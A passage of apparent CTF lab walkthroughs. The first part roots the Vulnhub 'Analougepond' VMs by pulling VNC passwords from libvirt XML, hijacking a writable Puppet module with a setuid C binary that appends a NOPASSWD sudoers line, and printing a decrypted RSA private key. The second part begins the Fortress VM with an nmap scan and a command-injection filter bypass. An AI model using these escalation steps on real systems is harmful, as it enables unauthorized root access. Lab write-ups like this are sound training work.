    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/barringsbank-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:6d:93:6a'/>
      <source network='default'/>
      <model type='rtl8139'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' passwd='memphistennessee'/>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x05' function='0x0'/>
    </memballoon>
  </devices>
</domain>

-------------------------------------------------

root@analoguepond:/etc/libvirt/qemu# cat puppet.xml 
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made using:
  virsh edit puppet
or other application using the libvirt API.
-->

<domain type='qemu'>
  <name>puppet</name>
  <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
  <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
  <memory unit='KiB'>1048576</memory>
  <currentMemory unit='KiB'>1048576</currentMemory>
  <vcpu placement='static'>1</vcpu>
  <os>
    <type arch='x86_64' machine='pc-i440fx-trusty'>hvm</type>
    <boot dev='cdrom'/>
    <boot dev='hd'/>
    <bootmenu enable='yes'/>
    <bios useserial='yes'/>
  </os>
  <features>
    <acpi/>
    <apic/>
    <pae/>
  </features>
  <clock offset='utc'/>
  <on_poweroff>destroy</on_poweroff>
  <on_reboot>restart</on_reboot>
  <on_crash>restart</on_crash>
  <devices>
    <emulator>/usr/bin/qemu-system-x86_64</emulator>
    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/var/lib/libvirt/images/puppet-1.img'/>
      <target dev='hdb' bus='ide'/>
      <address type='drive' controller='0' bus='0' target='0' unit='1'/>
    </disk>
    <controller type='pci' index='0' model='pci-root'/>
    <controller type='ide' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x1'/>
    </controller>
    <controller type='usb' index='0'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x2'/>
    </controller>
    <interface type='network'>
      <mac address='52:54:00:5b:05:f7'/>
      <source network='default'/>
      <model type='virtio'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
    </interface>
    <serial type='pty'>
      <target port='0'/>
    </serial>
    <console type='pty'>
      <target type='serial' port='0'/>
    </console>
    <input type='mouse' bus='ps2'/>
    <input type='keyboard' bus='ps2'/>
    <graphics type='vnc' port='-1' autoport='yes' listen='127.0.0.1' passwd='sendyoubacktowalker'>
      <listen type='address' address='127.0.0.1'/>
    </graphics>
    <video>
      <model type='cirrus' vram='9216' heads='1'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x02' function='0x0'/>
    </video>
    <memballoon model='virtio'>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x04' function='0x0'/>
    </memballoon>
  </devices>
</domain>

Here we are:

‘memphistennessee’ and ‘sendyoubacktowalker’

So I next attempt to SSH to the puppet host  and am presented with a possible username and a password hint in the SSH banner:

root@analoguepond:/etc/libvirt/qemu# ssh 192.168.122.2
The authenticity of host '192.168.122.2 (192.168.122.2)' can't be established.
ECDSA key fingerprint is 4e:e6:d6:38:8a:9b:3c:aa:0c:55:95:a6:57:ce:f9:e5.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.122.2' (ECDSA) to the list of known hosts.
+-----------------------------------------------+
Passwords are very dated.. Removing spaces helps sandieshaw log in with her 
most famous song                                                            
+-----------------------------------------------+

Back to Google because I clearly do not have knightmare’s music knowledge and I see that Sandie Shaw’s most famous song was called ‘Puppet on a String’. At the time I wasn’t sure if the host name referred to the song name or the Puppet open-source configuration management tool. Knowing knightmare I figured it was the latter and I was in for a wild ride yet.

I logged in with the password ‘puppetonastring’ and things started to get really interesting.

My suspicions were confirmed upon checking out the /etc/puppet directory.  Basically, Puppet is an open-source configuration management tool written in Ruby which uses a series of declarative statements in the form of ‘modules’ to push down configuration changes based upon a client-server model. Seeing that port 8140 and the modules/manifests in the /etc/puppet directory confirmed that I was on the puppetmaster server and the other host in play was the client. Browsing the manifests folder for each module we can see what each module does based on the init.pp file which declares a class and any files, content, commands, permissions, services to install etc.

The nodes.pp file located in /etc/puppet/manifests show which hosts have which modules pushed down to them when a puppet run happens.

sandieshaw@puppet:/etc/puppet/manifests$ cat nodes.pp 

node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  }
sandieshaw@puppet:/etc/puppet/manifests$ cat site.pp 
node 'default' {
  include vulnhub
  }

node 'puppet.example.com' inherits 'default' {
  include wiggle
  }

node 'barringsbank.example.com' inherits 'default' {
  include fiveeights
  }

In this case we see that both hosts have the vulnhub module pushed by inheriting the ‘default’ node and that puppet has the wiggle module and our third host barringsbank has the fiveeights module pushed down.

The vulnhub module is hilarious and is knightmare’s revenge/way of stripping out every convenient utility we usually rely on. Bye curl, wget, fetch. No Nano! I started sweating, now I HAD to use vim. Thanks man! The module does a bunch of other stuff which is pretty self-explanatory but one key is that the ‘puppet check in’ cron which happens every 10 minutes. This tells us that hosts will check into the puppetmaster every 10 minutes for anything new, like abused modules :).

sandieshaw@puppet:/etc/puppet/modules/vulnhub/manifests$ cat init.pp 
## Module to unwind changed #vulnhub people make.  This will unwind the most
## common vectors they sued to get at my other VMs

class vulnhub {

## purge packages they abuse too (hello mrB3n, GKNSB, Ch3rn0byl, mr_h4sh)
$purge = [ "nano", "wget", "curl", "fetch","nmap", "netcat-traditional",
           "ncat", "netdiscover", "lftp" ]
  package { $purge:
  ensure => purged,
  }

## The encryption is still primative Egyptian
$theresas_nightmare = [ "cryptcat", "socat" ]
  package { $theresas_nightmare:
  ensure => present,
  }

## Adding to sudoers is a bit naughty so reverse that (most of #vulnhub)
file { "/etc/sudoers.d":
  ensure => "directory",
  recurse => true,
  purge   => true,
  force   => true,
  owner   => root,
  group   => root,
  mode    => 0755,
  source  => "puppet:///modules/vulnhub/sudoers.d",
  }

## revert /etc/passwd (Hey Rasta_Mouse!)
file {'/etc/passwd':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-passwd",
  }

## and /etc/group (Hello to you cmaddy)
file {'/etc/group':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-group",
  }

## Mr Potato Head! BACKDOORS ARE NOT SECRETS (Hey GKNSB!)
file {'/etc/ssh/ssd_config':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-sshd_config",
  notify => Service["ssh"],
  }

## Leave US keyboard for those crazy yanks, and not to torture Ch3rn0byl like
## Gibson
cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

## Everyone forbidden by default
file {'/etc/hosts.deny':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/hosts.deny",
  }

## Firewall off to only specific hosts
file {'/etc/hosts.allow':
  ensure => present,
  owner  => root,
  group  => root,
  mode   => 0644,
  source => "puppet:///modules/vulnhub/${hostname}-hosts.allow",
  }


## Don't fill up the disk
tidy { "/var/lib/puppet/reports":
   age     => "1h",
   recurse => true,
  }

## Changing openssh config requires restart
service { 'ssh':
  ensure      => running,
  enable      => true,
  hasstatus   => true,
  hasrestart  => true,
  }

}

The wiggle module  directory gives us the source code for the C file that creates our spin binary which is funny but useless to attempt to reverse based on the source code. Stay tuned though, it will come into play soon.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls
spin  spin.c
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ cat spin.c 
#include <stdio.h>
#include <unistd.h>

void
advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);
    pos = (pos + 1) % nbars;
}

int
main() {
    while (1) {
        advance_spinner();
        usleep(300);
    }

    return 0;
}

The wiggle manifest is more interesting and is likely our priv esc. Every puppet run will check to make sure that /tmp/spin is present and then chown it as root and set the SUID bit.

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }
}

The spin binary is copied from /etc/puppet/modules/wiggle/files and luckily sandieshaw has write permissions on it so we can do something nasty.

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls -lah
total 732K
drwxrwxr-x 2 root       sandieshaw 4.0K Dec 18 18:42 .
drwxr-xr-x 4 root       root       4.0K Dec 18 18:42 ..
-rwxrwxr-x 1 sandieshaw sandieshaw 717K Dec 17 11:51 spin
-rw-rw-r-- 1 sandieshaw sandieshaw  376 Dec 17 11:52 spin.c

I create my own version of the spin binary which allows me to run command as root like so…

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
  setuid( 0 );
  system( "/home/sandieshaw/rootme.sh" );
  return 0;
}

rootme.sh just contains the following to add sadieshaw to the sudoers group, which is the easiest way given everything that knightmare stripped away from us:

echo "sandieshaw ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers

I compile it offline and we can SCP it to the host but I’m lazy so lets just base64 encode offline and decode it on the target:

cat spin  | openssl base64 | awk 'BEGIN{ORS="";} {print}'

...snip...

sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ echo "huge bas64 string" | base64 -d > spin
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ file spin
spin: ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped

We know from earlier that the Puppet run is every 10 minutes so I set everything up and grab some coffee

cron { "puppet check in":
  command => "/usr/bin/puppet agent --test > /dev/null 2>&1",
  user => "root",
  minute => "*/10",
  ensure => present,
  }

After a bit I check and see that the spin binary was replaced based on the time stamp on the file and I am able to sudo to root without a password like a champion.

sandieshaw@puppet:/tmp$ ls -la
total 12
drwxrwxrwt  2 root root 4096 Jun 26 18:20 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root   57 Jun 26 18:11 spin
sandieshaw@puppet:/tmp$ ls -la
total 16
drwxrwxrwt  2 root root 4096 Jun 26 18:21 .
drwxr-xr-x 22 root root 4096 Jan  7 11:45 ..
-rwsr-xr-x  1 root root 7452 Jun 26 18:21 spin

sandieshaw@puppet:/tmp$ ./spin
sandieshaw@puppet:/tmp$ sudo -s
root@puppet:/tmp#

Once I escalate to root I check out the root directory for a flag or our next clues. I am presented with several files and clues.

root@puppet:/root# cd protovision/
root@puppet:/root/protovision# ls
flag1.txt.0xff  jim  melvin
root@puppet:/root/protovision# cat jim
Mr Potato Head! Backdoors are not a...
root@puppet:/root/protovision# cat melvin 
Boy you guys are dumb! I got this all figured out...
root@puppet:/root/protovision# file flag1.txt.0xff 
flag1.txt.0xff: ASCII text, with very long lines
root@puppet:/root/protovision# cat flag1.txt.0xff 
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861

So we have a hex string which I decode with xdd to a reversed base64 string and eventually the below YouTube file:

root@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r
==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHaroot@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r | rev | base64 -d
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...

This leads us to our mandatory movie reference, this one being from this scene in WarGames where the characters are discussing back doors. “Mr. Potato Head! Backdoors are not secrets.” In this case we may have a password of “‘secrets’ for something?

The characters also go on to correctly guess ‘Joshua’ is the back door phrase in the movie, I keep this in my back pocket for later. Maybe another password?

Exploring the directory yields a jpeg and then leads us down a rabbit hole of hidden directories.

puppet:/root/protovision# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7 17:49 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
root@puppet:/root/protovision# cd .I_have_you_now/
root@puppet:/root/protovision/.I_have_you_now# ls
grauniad_1995-02-27.jpeg
root@puppet:/root/protovision/.I_have_you_now# file grauniad_1995-02-27.jpeg 
grauniad_1995-02-27.jpeg: JPEG image data, JFIF standard 1.02
root@puppet:/root/protovision/.I_have_you_now# ls -la
total 84
drwxr-xr-x 3 root root  4096 Dec 21  2016 .
drwxr-xr-x 3 root root  4096 Dec 21  2016 ..
drwxr-xr-x 3 root root  4096 Dec 18  2016 .a
-r-------- 1 root root 71790 Dec 18  2016 grauniad_1995-02-27.jpeg

The jpeg file does have something hidden in the exif data:

root@kali2:~/Desktop# exiftool grauniad_1995-02-27.jpeg 
ExifTool Version Number         : 10.36
File Name                       : grauniad_1995-02-27.jpeg
Directory                       : .
File Size                       : 70 kB
File Modification Date/Time     : 2016:12:22 22:53:22-05:00
File Access Date/Time           : 2016:12:22 22:53:25-05:00
File Inode Change Date/Time     : 2016:12:22 22:53:22-05:00
File Permissions                : rwxr-xr-x
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : Acorn version 4.5.1
Exif Image Width                : 460
Exif Image Height               : 276
XP Comment                      : SHA1SUM 0a1f5d1ba9f15fd38b6e37734707bfd295a6795c
Padding                         : (Binary data 2060 bytes, use -b option to extract)
JFIF Version                    : 1.02
Image Width                     : 460
Image Height                    : 276
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 460x276
Megapixels                      : 0.127

I was unable to decrypt the sha1 but I hold onto it for later, knowing that knightmare doesn’t generally make mistakes or put things in his challenges that aren’t connected.

I list out all the subdirectories and am damn glad I didn’t do this by hand.

root@puppet:/root/protovision/.I_have_you_now# find . -type d
.
./.a
./.a/.b
./.a/.b/.c
./.a/.b/.c/.d
./.a/.b/.c/.d/.e
./.a/.b/.c/.d/.e/.f
./.a/.b/.c/.d/.e/.f/.g
./.a/.b/.c/.d/.e/.f/.g/.h
./.a/.b/.c/.d/.e/.f/.g/.h/.i
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z

Heading in I find several files which look to form a private key if assembled properly. At the bottom of this mess I find a file with the phrase ‘joshua’ which we earlier established must be useful for so mething as well as a gpg encrypted file that by the fle name could be an ssh key for a user ‘nleeson’.

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ls
my_world_you_are_persistent_try  nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# file my_world_you_are_persistent_try 
my_world_you_are_persistent_try: ASCII text
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat my_world_you_are_persistent_try 
joshua

The gpg file decrypts to a private key file as suspected. The password that worked was actually ‘secret’ not ‘secrets’.

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# gpg -d nleeson_key.gpg 
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16

RTSpHZnf1Onpy3OHfSat0Bzbrx8wd6EBKlbdZiGjEB0AC4O0ylrSBoWsEJ/loSL8
jdTbcSG0/GWJU7CS5AQdK7KctWwqnOHe9y4V15gtZcfgxNLrVfMUVAurZ3n2wQqK
ARmqBXhftPft8EBBAwWwQmBrD+ufF2uaJoKr4Bfu0zMFQxRnNDooBes5wyNO/7k6
osvGqTEX/xwJG1GB5X0jsDCmBH4WXhafa0nzZXvd2Pd3UpaWPEgyq3vxIQaredR8
VbJbPSeKypTIj3UyEj+kjczhCiWw9t0Mv0aV4FtMOesnDQYJskL8kSLGRkN+7lHD
IcHz7az9oqYGBSq77lPkmk7oIpT/pg80pfCyHExROwlTRPzVRHv7KGiKd35R0Hl9
7CUQPCjH5ltQW4B6XUmxmoT8N14w5HOxb/JlV7s2g6dXYT0azOeqDsGivpgMY3vy
rtVakLIsZeYaZYSr6WvTFclXWYctYPMgzRewiRPjyn6DXiD6MtCJZj2CqJ47tP37
eRRgRRH6a1Sm/BkfSPIXlV0tTpOXfjtHG7VoIc5X343GL/WHM/nhNFvMLdRnVXRM
YOEKAsYklBLqZ99btTESwJZt9HG/cGpQrbgFwxKPoJy7f5wNLOa1ZhpDyw1IqokO
Pq4r8zZj4ASyg3gl7ByG11C272mkMG8yiIwOckVgNec/se18PUGBw1HHgRuyzDym
/6/cwkDzoJlResjsNDQCQcNzSOoZxi3GFIIiB+HjG84MF+ofnn3ayaUZLUaBbPMJ
jQ7dP6wqIMYwY5ZM6nRQ+RnL6QVBHnXH9RjmbzdVMzmQDjPS0lOg5xkU8B78vG6e
lphvmlLSM+PFVOqPwhVB8yon97aU23npKIOPu44VsUXU0auKI94qoX0I1EDDQFrE
UqpWUpCCHrRRTZCdnnE6RnJZ+rjGPvFA95lhUp1fpF8l4U3a8qKlsdtWmzYxHdyg
+w0QE8VdDsNqgCP7W6KzvN5E5HJ0bbQasadAX5eDd6I94V0fCZrPlzM+5CAXH4E4
qhmWQPCw7Q1CnW61yG8e9uD1W7yptK5NyZpHHkUbZGIS+P7EZtS99zDPh3V4N7I2
Mryzxkmi2JyQzf4T1cfK7JTdIC2ULGmFZM26BX3UCV0K+9OOGgRDPU4noS0gNHxP
VaWVmjGgubE4GDlW0tgw1ET+LaUdAv/LE+3gghpRLn1imdaW9elnIeaVeOWcyrBC
Ypl8AjYXNRd0uLWBC8xbakmK1tZUPXwefqjQpKjuIuYmmVes3M4DFxGQajmK03nO
oGaByHu0RVjy0x/zBuOuOp6eKpeaiLWfLM5DSIWlksL/2dmAloSs3LrIPu4dTnRb
v2YQ+72nLI62alLEaKwXUBoHSSRNTv0hbOyvV8YUp4EmJ8yShAmEE/n9Et62BwYB
rsi0RhEfih+43PzlwB91I4Elr2k3eBwQ9XiF3KdVgj6wvwqNLZ7aC5YpLcYaVyNT
fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx
Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB
-----END RSA PRIVATE KEY-----
gpg: WARNING: message was not integrity protected

I test out the key and am able to SSH to the barringsbank host with the private key and passphrase ‘joshua’ from earlier.

root@puppet:/root# chmod 600 nick_key 
root@puppet:/root# ssh -i nick_key nleeson@192.168.122.3
Enter passphrase for key 'nick_key': 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

nleeson@barringsbank:~$

This system is pretty bare so I turn back to Puppet for clues. Taking a look at the Puppet configuration I see that I can edit /etc/puppet/manifests/site.pp and nodes.pp to include the wiggle module on barringsbanks. I make this change and wait a  bit.

nleeson@barringsbank:~$ cd /tmp
nleeson@barringsbank:/tmp$ ./spin
nleeson@barringsbank:/tmp$ sudo -s
root@barringsbank:/tmp# cd /root
root@barringsbank:/root# ls
me.jpeg

Now we have another image file which I pull down locally and run steghide against. We’ve come full circle and the term ‘reticulating splines’ was the passphrase.

root@kali:/var/www/html# steghide extract -sf me.jpeg 
Enter passphrase: 
wrote extracted data to "primate_egyptian_flag.txt".
root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt 
674143496741434967414349674143496741434967414349674143496741
69434b34694c7555336235426963765a47497a4e5859694269636c526d62
6c5a4749684279636e556d636c686b430a67414349674143496741434967
41434967414349674143496741434967414349674143494b386c4c743053
4c7538464967414349674143496734534c73414349674143496741434967
4143490a6741434967414349674143496741434967414349674143496741
43496741434967414349674143494b34435967414349674143496763794a
74347958663543586742434938424349674143490a663931586639315866
393158663931586639315875307a4b7273434c6741434967414349674143
4967416943634243496734434c6741795867414349674143496741795867
414358674143490a39305450393054503930545039305450393054503934
796276396d4c666843496741434967414349674143494b77484967414349
3878335838394666663931586639315838783358703831580a3842434967
414349674143496741434967414349674143496e346e6667414349674143
496741434967414349676f41666741434967774866397758503831545039
30545039774866393054500a677746496741434967414349674143496741
434967414349674143496741434967414349674143496741434967414349
4b384349673847497642794a2b424749674143496741794a2b4243490a67
636966674243496741434967414349674143496741434967414349674143
4967414349674143496741434967414349674143494b3843496738474976
4243496741434963426d66764143490a765a47496b355759673457616864
575967553259753947493139576567384764674d6e62766c476468785764
30466d636e353262447067434b41794a7434795866393158753043596741
43490a673847646751575a704a486467556d646e6b6b434b4153496e4647
626d7077637068476467636d62704a5864304258596a4269627642535a74
6c476467674764346c326367554761304269630a734233636852585a7442
7964764a486130425362764a6e5a676b5859334647496c5a336274427962
3042434c6c4a585a6f424364704a474968424363314279636e3557616f52
4849346c57620a3042435a6c6c33627135575a67556d6468684749313957
6567554763766847494a42694c7a646d627068476467515859674d486470
3947627768585a6749575a3342435a75466d43306c32620a774258596755
6d596751476231393264675133596c423363684279637068476467343262
67733259684a475a6c566d5a4b495864766c48496b355759673432627052
6e6376424849304647610a6a563263674d57613046576276525864684279
626b427962304243646c4e48496c4a5859674d58545742535a7a56476130
42434c6c5233627542695a507067437551575a304657616a566d630a674d
335a756c4761304243636c56326167384764675148616e563362674d5861
6f524849764e6e437351585a774258647742795a756c3263314279636c52
58596b425864676b4864704a58640a4331474d6b3557595342434c754e6a
5179314749765248497a746d6268684764676b6e6268316b434b34535a73
4233626c42484979396d5a6767325a31396d626c42795970315759756c48
5a0a354279617546476130424362686c32596c42336367456b434b346952
554e45497a6c47613042795a756c47647a564764674933626d4269657535
57613256326167516d62684269576c5258650a685a6e436c68476467516d
62684279636c646d626c78476268683259675532636c6847646777476268
42795a756c47647a394761674933626d427961786b576230427a5a673847
64675533620a68424364755632596c4a48497a6c4761674933626d426962
7a496d637442796230424364686847496c68476467593262674158613042
53516734535a6a6c6d646b4647496c786d59685648620a765a47496e3557
61723932627342535a7946474931395765675957616749585a3052586133
52484979394749444a565367343262675557624b5158614942694c6c4e6d
6268523363704e33630a30564762773132624442434c7539474976646b43
4b34535a6e35575a737857596f4e6d436c6847646751575a305647627731
32626a42535a324647616749336267516e6270684749684269630a7a526d
626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c
42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c7832
59796c3259675547613042535a0a676f77507534694c7534326270523359
6c356d62764e47496c684764674d334a304647615842694c7555544f3545
4449444a6b51676b79516f414361304a33624f42535a6f526c43756c4549
0a6741434967414349674143496741434967414349674143496741434967
414349674143496741434967414349674143496741434967414349674143
49674143496741434967414349674143490a3d6f515a794657623068325a
70353253743043490a

Looks like hex again, which then decodes to another reversed base64 string.  At last, the final flag:

root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt | xxd -p -r | rev | base64 -d

What an awesome, intense, and comprehensive challenge! Thanks to knightmare for making this and to g0tm1lk and the whole vulnhub community for hosting this one! Until next time.

Fortress Vulnhub CTF Walkthrough

4 new VMs dropped on Vulnhub the other day which were created by members of the Vulnhub CTF team for the DefCon Toronto CTF.

I grabbed Fortress by superkojiman first, you can get it here: https://www.vulnhub.com/entry/dc416-2016,168/

Each VM has a landing page which describes the challenge and number of flags:

I. Discovery

I started off with an nmap scan and didn’t turn up anything other than the standard web and SSH ports.

root@kali~# nmap -sV 172.16.94.143

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-06 09:59 EST
Nmap scan report for 172.16.94.143
Host is up (0.00040s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
MAC Address: 00:0C:29:D5:71:50 (VMware)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.06 seconds

I ran Nikto next but did not get anything back so fired up Dirbuster which turned up a scanner.php page pretty quickly.

II. Command Injection

Firing up Burp and sending the request to repeater screams command injection.

Bit of a troll here, tried several tactics and all gave me this result.

Eventually I found that a carriage return would bypass the filter.

Here is the contents of scanner.php which shows the characters being filtered.

<html>
<head>
<title>S C A N N 3 R</title>
<link rel="stylesheet" href="styles.css" type="text/css" />
</head>
<body>

<div class="container">

<form method="POST" action="">
  <input class="form" type="text" name="host" value="127.0.0.1" />
  <input class="button" type="submit" value="Scan Target" />
</form>
